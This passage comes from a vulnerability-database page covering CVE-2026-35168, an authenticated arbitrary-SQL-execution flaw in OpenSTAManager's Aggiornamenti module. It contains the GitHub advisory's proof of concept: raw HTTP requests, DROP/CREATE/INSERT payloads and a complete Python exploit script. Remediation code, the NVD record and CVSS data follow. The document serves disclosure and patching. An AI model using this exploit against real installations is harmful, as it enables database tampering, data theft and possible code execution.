at line 489\n4. `modules/aggiornamenti/actions.php` reads the `queries` POST parameter (line 41)\n5. JSON-decodes it into an array of strings (line 50)\n6. Iterates over each string and executes it as a SQL query via `$dbo-\u003equery()` (line 76)\n\n### Why This Is Exploitable\n\n- The feature is intended for resolving database schema conflicts during updates\n- However, there is no restriction on what SQL can be executed\n- Any authenticated user with `rw` permission on the Aggiornamenti module can exploit this\n- The default admin account always has access to this module\n\n## Proof of Concept\n\n### Prerequisites\n\n- A valid user account with access to the Aggiornamenti module\n\n### Step 1: Authenticate\n\n```\nPOST /index.php HTTP/1.1\nHost: \u003ctarget\u003e\nContent-Type: application/x-www-form-urlencoded\n\nop=login\u0026username=\u003cuser\u003e\u0026password=\u003cpass\u003e\n```\n\nSave the `PHPSESSID` cookie.\n\n### Step 2: Detect Aggiornamenti Module ID\n\nNavigate to the application dashboard and inspect the sidebar links. The Aggiornamenti module URL contains `id_module=\u003cID\u003e`. Default value in a standard installation: `6`.\n\n### Step 3: Execute Arbitrary SQL\n\n**Request (captured in Burp Suite):**\n\n```\nPOST /editor.php?id_module=6\u0026id_record=6 HTTP/1.1\nHost: 127.0.0.1:8888\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nConnection: keep-alive\nCookie: PHPSESSID=6a1a8ab261f8d93c6e21d2ee566c17a5\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database\u0026queries=%5B%22DROP+TABLE+IF+EXISTS+poc_vuln04_verify%22%2C+%22CREATE+TABLE+poc_vuln04_verify+%28id+INT+AUTO_INCREMENT+PRIMARY+KEY%2C+proof+VARCHAR%28255%29%2C+ts+TIMESTAMP+DEFAULT+CURRENT_TIMESTAMP%29%22%2C+%22INSERT+INTO+poc_vuln04_verify+%28proof%29+VALUES+%28%27CVE_PROOF_arbitrary_sql_execution%27%29%22%5D\n```\n\nThe URL-decoded `queries` parameter is:\n\n```json\n[\n \"DROP TABLE IF EXISTS poc_vuln04_verify\",\n \"CREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n \"INSERT INTO poc_vuln04_verify (proof) VALUES (\u0027CVE_PROOF_arbitrary_sql_execution\u0027)\"\n]\n```\n\nThree arbitrary SQL statements are sent: `DROP TABLE`, `CREATE TABLE`, and `INSERT INTO` \u2014 demonstrating full control over the database.\n\n**Response (captured in Burp Suite):**\n\nThe server responds with HTTP 200 and the following JSON response confirming successful execution of all 3 queries:\n\n```json\n{\"success\":true,\"message\":\"Tutte le query sono state eseguite con successo (3 query).\u003cbr\u003e\u003cbr\u003eQuery eseguite:\u003cbr\u003eDROP TABLE IF EXISTS poc_vuln04_verify\u003cbr\u003eCREATE TABLE poc_vuln04_verify (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\u003cbr\u003eINSERT INTO poc_vuln04_verify (proof) VALUES (\u0027CVE_PROOF_arbitrary_sql_execution\u0027)\",\"flash_message\":true}\n```\n\n\u003cimg width=\"1490\" height=\"355\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f0df5dd9-4ede-4503-8e00-58c47f2cd06a\" /\u003e\n\n\n### Step 4: Verify Execution\n\nThe table `poc_vuln04_verify` was created in the database with the inserted data, confirming that arbitrary SQL was executed. The server confirms: `\"Tutte le query sono state eseguite con successo (3 query).\"`\n\n### Observed Results\n\n| Action | Result |\n|---|---|\n| `DROP TABLE IF EXISTS` | Table dropped successfully |\n| `CREATE TABLE` | Table created successfully |\n| `INSERT INTO` | Data inserted |\n| `SELECT VERSION()` (via INSERT...SELECT) | MySQL version extracted: `8.3.0` |\n| Server confirmation | `\"success\":true` with query count |\n| Execution with admin user | Success |\n| Execution with non-admin user (Tecnici group with module access) | Success |\n\n### Exploit\n\n```\npython3 poc_sql.py -t http://\u003ctarget\u003e:8888 -u admin -p admin\n```\n\n```python\n#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport re\nimport sys\nimport urllib3\n\nimport requests\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nDEFAULT_HEADERS = {\n \"User-Agent\": (\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) \"\n \"AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/120.0.0.0 Safari/537.36\"\n ),\n}\n\n\ndef parse_args():\n p = argparse.ArgumentParser(\n description=\"OpenSTAManager \u003c= 2.10.1 \u2014 Arbitrary SQL Exec in Aggiornamenti (PoC)\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=(\n \"Examples:\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin --proxy http://127.0.0.1:8080\\n\"\n \" %(prog)s -t http://target:8888 -u admin -p admin --module-id 6\\n\"\n ),\n )\n p.add_argument(\"-t\", \"--target\", required=True, help=\"Base URL (e.g. http://host:port)\")\n p.add_argument(\"-u\", \"--username\", required=True, help=\"Valid username for authentication\")\n p.add_argument(\"-p\", \"--password\", required=True, help=\"Password for authentication\")\n p.add_argument(\n \"--proxy\",\n default=None,\n help=\"HTTP proxy (e.g. http://127.0.0.1:8080 for Burp Suite)\",\n )\n p.add_argument(\n \"--module-id\",\n type=int,\n default=None,\n help=\"Aggiornamenti module ID (auto-detected if omitted)\",\n )\n p.add_argument(\n \"--verify-only\",\n action=\"store_true\",\n help=\"Only verify the vulnerability, do not extract data\",\n )\n return p.parse_args()\n\n\nclass OSMExploit:\n def __init__(self, args):\n self.target = args.target.rstrip(\"/\")\n self.username = args.username\n self.password = args.password\n self.module_id = args.module_id\n self.session = requests.Session()\n self.session.headers.update(DEFAULT_HEADERS)\n self.session.verify = False\n\n if args.proxy:\n self.session.proxies = {\"http\": args.proxy, \"https\": args.proxy}\n\n self.request_count = 0\n\n def login(self):\n info(\"Authenticating as \u0027%s\u0027...\" % self.username)\n\n # First GET to obtain a valid session cookie\n self.session.get(f\"{self.target}/index.php\")\n self.request_count += 1\n\n r = self.session.post(\n f\"{self.target}/index.php\",\n data={\"op\": \"login\", \"username\": self.username, \"password\": self.password},\n allow_redirects=False,\n )\n self.request_count += 1\n\n if r.status_code != 302:\n fail(\"Login failed (HTTP %d). Check credentials.\" % r.status_code)\n return False\n\n location = r.headers.get(\"Location\", \"\")\n\n # Success redirects to controller.php; failure redirects back to index.php\n if \"controller.php\" in location:\n success(\"Authenticated successfully.\")\n # Follow redirect to establish full session\n self.session.get(f\"{self.target}/{location.lstrip(\u0027/\u0027)}\", allow_redirects=True)\n self.request_count += 1\n return True\n\n # If redirected back to index.php, the login failed\n # Common causes: wrong credentials, brute-force lockout, or active session token\n fail(\"Login failed \u2014 redirected to \u0027%s\u0027.\" % location)\n fail(\"Possible causes:\")\n fail(\" 1. Wrong credentials\")\n fail(\" 2. Brute-force lockout (wait 3 min or clear zz_logs)\")\n fail(\" 3. Active session token (another session is open)\")\n fail(\" Tip: clear the token with SQL: UPDATE zz_users SET session_token=NULL WHERE username=\u0027%s\u0027;\" % self.username)\n return False\n\n def detect_module_id(self):\n if self.module_id is not None:\n info(\"Using provided module ID = %d\" % self.module_id)\n return True\n\n info(\"Auto-detecting Aggiornamenti module ID...\")\n # Search for the module ID in the navigation HTML\n r = self.session.get(f\"{self.target}/index.php\", allow_redirects=True)\n self.request_count += 1\n\n # Look for sidebar link: \u003ca href=\"/controller.php?id_module=6\" ...\u003e...\u003cp\u003eAggiornamenti\u003c/p\u003e\n\n matches = re.findall(r\u0027id_module=(\\d+)\"[^\u003c]*\u003c[^\u003c]*\u003c[^\u003c]*Aggiornamenti\u0027, r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Secondary pattern: data-id attribute near Aggiornamenti text\n matches = re.findall(r\u0027data-id=\"(\\d+)\"[^\u003c]*onclick[^\u003c]*id_module=\\d+[^\u003c]*\u003c[^\u003c]*\u003c[^\u003c]*\u003c[^\u003c]*Aggiornamenti\u0027, r.text)\n if matches:\n self.module_id = int(matches[0])\n success(\"Aggiornamenti module ID = %d\" % self.module_id)\n return True\n\n # Fallback: try common IDs\n for test_id in [6, 7, 8, 5, 4]:\n r = self.session.get(\n f\"{self.target}/controller.php?id_module={test_id}\",\n allow_redirects=True,\n )\n self.request_count += 1\n if \"Aggiornamenti\" in r.text or \"aggiornamenti\" in r.text.lower():\n self.module_id = test_id\n success(\"Aggiornamenti module ID = %d\" % test_id)\n return True\n\n fail(\"Could not detect Aggiornamenti module ID. Use --module-id N.\")\n return False\n\n def execute_sql(self, queries):\n \"\"\"Execute arbitrary SQL via risolvi-conflitti-database.\"\"\"\n r = self.session.post(\n f\"{self.target}/editor.php?id_module={self.module_id}\u0026id_record={self.module_id}\",\n data={\n \"op\": \"risolvi-conflitti-database\",\n \"queries\": json.dumps(queries),\n },\n )\n self.request_count += 1\n return r\n\n def verify(self):\n marker_table = \"poc_vuln04_verify\"\n marker_value = \"CVE_PROOF_arbitrary_sql_execution\"\n\n info(\"Step 1: Creating marker table via arbitrary SQL execution...\")\n queries = [\n f\"DROP TABLE IF EXISTS {marker_table}\",\n f\"CREATE TABLE {marker_table} (id INT AUTO_INCREMENT PRIMARY KEY, proof VARCHAR(255), ts TIMESTAMP DEFAULT CURRENT_TIMESTAMP)\",\n f\"INSERT INTO {marker_table} (proof) VALUES (\u0027{marker_value}\u0027)\",\n ]\n r = self.execute_sql(queries)\n info(\"Response: HTTP %d\" % r.status_code)\n\n info(\"Step 2: Verifying marker table exists by reading it back...\")\n # Use a second query to read the data via a UNION or time-based approach\n # Since we can execute arbitrary SQL, we can verify by creating another\n # marker and checking via a SELECT INTO approach\n verify_queries = [\n f\"INSERT INTO {marker_table} (proof) VALUES (CONCAT(\u0027verified_\u0027, (SELECT VERSION())))\",\n ]\n r2 = self.execute_sql(verify_queries)\n\n # The JSON response may be embedded within HTML (editor.php renders the full page\n # after executing the action). Extract JSON from the response body.\n\n for resp in [r, r2]:\n # Try parsing as pure JSON first\n try:\n data = resp.json()\n if data.get(\"success\"):\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table \u0027%s\u0027 created with proof value.\" % marker_table)\n info(\"Response: %s\" % data.get(\"message\", \"\")[:200])\n return True\n except (ValueError, KeyError):\n pass\n\n # Extract embedded JSON from HTML response\n json_match = re.search(r\u0027\\{\"success\"\\s*:\\s*true\\s*,\\s*\"message\"\\s*:\\s*\"([^\"]*)\"\u0027, resp.text)\n if json_match:\n success(\"SQL EXECUTION CONFIRMED! Server accepted and executed arbitrary SQL.\")\n success(\"Marker table \u0027%s\u0027 created with proof value.\" % marker_table)\n info(\"Server message: %s\" % json_match.group(1)[:200])\n return True\n\n # Check for query execution indicators in response\n if \"query sono state eseguite\" in resp.text or \"query eseguite\" in resp.text.lower():\n success(\"SQL EXECUTION CONFIRMED! Server reports queries were executed.\")\n return True\n\n fail(\"Could not verify SQL execution. Check target manually.\")\n fail(\"Tip: use --module-id N if auto-detection failed.\")\n return False\n\n def cleanup(self):\n info(\"Cleaning up marker tables...\")\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_verify\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_marker\"])\n self.execute_sql([\"DROP TABLE IF EXISTS poc_vuln04_tecnico\"])\n success(\"Cleanup complete.\")\n\n\n# \u2500\u2500 Output helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef info(msg):\n print(f\"\\033[34m[*]\\033[0m {msg}\")\n\ndef success(msg):\n print(f\"\\033[32m[+]\\033[0m {msg}\")\n\ndef fail(msg):\n print(f\"\\033[31m[-]\\033[0m {msg}\")\n\n\n# \u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n\ndef main():\n args = parse_args()\n exploit = OSMExploit(args)\n\n if not exploit.login():\n sys.exit(1)\n\n if not exploit.detect_module_id():\n sys.exit(1)\n\n print()\n info(\"=== Vulnerability Verification ===\")\n if not exploit.verify():\n sys.exit(1)\n\n print()\n info(\"=== Cleanup ===\")\n exploit.cleanup()\n\n print()\n success(\"Verification complete. %d HTTP requests sent.\" % exploit.request_count)\n info(\n \"All traffic was sent through the configured proxy.\"\n if args.proxy\n else \"Tip: use --proxy http://127.0.0.1:8080 to capture in Burp Suite.\"\n )\n\n\nif __name__ == \"__main__\":\n main()\n```\n\n## Impact\n\n- **Confidentiality:** Complete database exfiltration \u2014 credentials, PII, financial data, configuration secrets.\n- **Integrity:** Full control over all database tables \u2014 insert, update, delete any record. An attacker can create new admin accounts, modify financial records, or plant backdoors.\n- **Availability:** An attacker can `DROP` critical tables, corrupt data, or execute resource-intensive queries to cause denial of service.\n- **Potential Remote Code Execution:** Depending on MySQL server configuration, an attacker may be able to use `SELECT ... INTO OUTFILE` to write arbitrary files to the server filesystem, or use MySQL UDF (User Defined Functions) to execute operating system commands.\n\n## Proposed Remediation\n\n### Option A: Remove Direct Query Execution (Recommended)\n\nReplace the arbitrary SQL execution with a predefined set of safe operations. The conflict resolution feature should only execute queries that were generated by the application itself, not user-supplied SQL:\n\n```php\ncase \u0027risolvi-conflitti-database\u0027:\n $queries_json = post(\u0027queries\u0027);\n $queries = json_decode($queries_json, true);\n\n if (empty($queries)) {\n echo json_encode([\u0027success\u0027 =\u003e false, \u0027message\u0027 =\u003e tr(\u0027Nessuna query ricevuta.\u0027)]);\n break;\n }\n\n // ALLOWLIST: Only permit specific safe SQL patterns\n $allowed_patterns = [\n \u0027/^ALTER\\s+TABLE\\s+`?\\w+`?\\s+(ADD|MODIFY|CHANGE|DROP)\\s+/i\u0027,\n \u0027/^CREATE\\s+INDEX\\s+/i\u0027,\n \u0027/^DROP\\s+INDEX\\s+/i\u0027,\n \u0027/^UPDATE\\s+`?zz_views`?\\s+SET\\s+/i\u0027,\n \u0027/^INSERT\\s+INTO\\s+`?zz_/i\u0027,\n ];\n\n $safe_queries = [];\n $rejected = [];\n\n foreach ($queries as $query) {\n $is_safe = false;\n foreach ($allowed_patterns as $pattern) {\n if (preg_match($pattern, trim($query))) {\n $is_safe = true;\n break;\n }\n }\n\n if ($is_safe) {\n $safe_queries[] = $query;\n } else {\n $rejected[] = $query;\n }\n }\n\n if (!empty($rejected)) {\n echo json_encode([\n \u0027success\u0027 =\u003e false,\n \u0027message\u0027 =\u003e tr(\u0027Query non permesse rilevate. Operazione bloccata.\u0027),\n ]);\n break;\n }\n\n // Execute only validated queries\n foreach ($safe_queries as $query) {\n $dbo-\u003equery($query);\n }\n // ...\n```\n\n### Option B: Server-Side Query Generation\n\nInstead of accepting raw SQL from the client, have the client send operation descriptors and generate the SQL on the server:\n\n```php\ncase \u0027risolvi-conflitti-database\u0027:\n $operations = json_decode(post(\u0027operations\u0027), true);\n\n foreach ($operations as $op) {\n switch ($op[\u0027type\u0027]) {\n case \u0027add_column\u0027:\n $table = preg_replace(\u0027/[^a-zA-Z0-9_]/\u0027, \u0027\u0027, $op[\u0027table\u0027]);\n $column = preg_replace(\u0027/[^a-zA-Z0-9_]/\u0027, \u0027\u0027, $op[\u0027column\u0027]);\n $type = preg_replace(\u0027/[^a-zA-Z0-9_() ]/\u0027, \u0027\u0027, $op[\u0027datatype\u0027]);\n $dbo-\u003equery(\"ALTER TABLE `{$table}` ADD COLUMN `{$column}` {$type}\");\n break;\n // ... other safe operations\n }\n }\n```\n\n### Option C: Restrict Access (Minimum Mitigation)\n\nAt minimum, restrict this operation to admin-only users:\n\n```php\ncase \u0027risolvi-conflitti-database\u0027:\n if (!auth_osm()-\u003egetUser()-\u003eis_admin) {\n echo json_encode([\u0027success\u0027 =\u003e false, \u0027message\u0027 =\u003e tr(\u0027Accesso negato.\u0027)]);\n break;\n }\n // ... existing code\n```\n\n**Note:** This alone is insufficient because even admin accounts can be compromised, and the feature still allows arbitrary SQL execution.\n\n### Additional Recommendations\n\n1. **Remove `SET FOREIGN_KEY_CHECKS=0`**: Foreign key checks should never be disabled based on user-initiated actions.\n2. **Sanitize error output**: Exception messages at line 79 leak database structure information. Replace with generic error messages.\n3. **Add CSRF protection**: Ensure the endpoint validates a CSRF token to prevent cross-site request forgery attacks.\n4. **Audit logging**: Log the actual SQL queries being executed (already partially implemented) but also log the requesting user\u0027s IP address and session.\n\n## Credits\nOmar Ramirez",
"id": "GHSA-2fr7-cc4f-wh98",
"modified": "2026-04-03T03:47:37Z",
"published": "2026-04-03T03:47:37Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35168"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74"
},
{
"type": "PACKAGE",
"url": "https://github.com/devcode-it/openstamanager"
},
{
"type": "WEB",
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "OpenSTAManager: SQL Injection via Aggiornamenti Module"
}
FKIE_CVE-2026-35168
Vulnerability from fkie_nvd - Published: 2026-04-02 14:16 - Updated: 2026-04-07 18:30
Severity ?
Summary
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| devcode | openstamanager | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
"matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F",
"versionEndExcluding": "2.10.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2."
}
],
"id": "CVE-2026-35168",
"lastModified": "2026-04-07T18:30:59.500",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-04-02T14:16:31.543",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74"
},
{
"source": "security-advisories@github.com",
"tags": [
"Product",
"Release Notes"
],
"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…